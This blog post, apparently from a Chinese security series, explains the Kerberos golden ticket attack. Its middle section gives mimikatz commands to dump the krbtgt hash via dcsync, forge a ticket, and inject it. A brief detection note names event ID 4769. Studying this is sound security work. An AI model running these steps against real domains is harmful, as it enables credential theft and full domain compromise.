域渗透系列--黄金票据

0x01 黄金票据原理

在kerberos协议身份请求认证中(如下图),不进行第一步AS-REQ和第二步AS-REP两个环节请求,利用伪造的ticket作为TGS-REQ的一部分发送到域控以获取service ticket这一过程。黄金票据是由域kerberos账号加密和签名(krbtgt 域账户的NTLM Hash 加密的Session-key as、 Client-info、timestamp)并且可以被域中的 KDC 服务解密。

krbtgt:KDC 服务使用的账号,属于 Domain Admins 组成员,可以用来生成访问服务器的票据

golden ticket.png
0x02 GoldenTicket制作
  • 域名
  • 域SID
  • KRBTGT NTLM或AES256
  • 用来伪造的用户名

1)获取域SID
whoami /user
红框里的是SID,外边的是RID,所以域SID就是S-1-5-21-16652XXXXXX-XXXXXXXXX-3128466792

sid.png

2)获取krbtgt hash
在域控上执行mimikatz提取krbtgt hash
mimikatz lsadump::dcsync /user:krbtgt /domain:DOMAIN_NAME

lsadump.png

3)生成黄金票据
在客户机上执行mimikatz
mimikatz # kerberos::golden /admin:admin111 /domain:DOMAIN_NAME /sid:S-1-5-21-XXXXXXXX-XXXXXXXX-3128466792 /krbtgt:NTLM_HASH/ticket:goldticket.kirbi

golden.png

4)清空kerberos原有票据并导入黄金票据
mimikatz # kerberos::purge
mimikatz # kerberos::ptt goldticket.kirbi
查询TGT是否导入成功
mimikatz # kerberos::tgt

注入TGT.png

图片.png

0x03 黄金票据检测和防御

通过查看DC事件日志eventID 4769 - 服务票证请求判断是否可能遭到goldenticket的攻击。


detect.png
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 票据传递攻击 这里介绍域内常用的两种攻击方式:黄金票据Golden ticket、白银票据SILVER TICKE...
    LMcream阅读 34,153评论 0 20
  • 前言 在进入内网进行渗透横向过程中,有时候会遇到域环境。学习整理下域环境中权限维持相关的技术。本次实验环境:win...
    Tide_诺言阅读 6,818评论 1 4
  • 前言 在横向渗透中,利用Ticket票据进行横向常常用在域环境里。常见的有三种攻击方式:ms14-068、Gold...
    CSeroad阅读 7,537评论 0 1
  • 这篇文章以由浅入深、层层深入的方式讲述基于Kerberos的Windows Network Authenticat...
    readilen阅读 9,445评论 0 2
  • 我是黑夜里大雨纷飞的人啊 1 “又到一年六月,有人笑有人哭,有人欢乐有人忧愁,有人惊喜有人失落,有的觉得收获满满有...
    陌忘宇阅读 12,739评论 28 53

友情链接更多精彩内容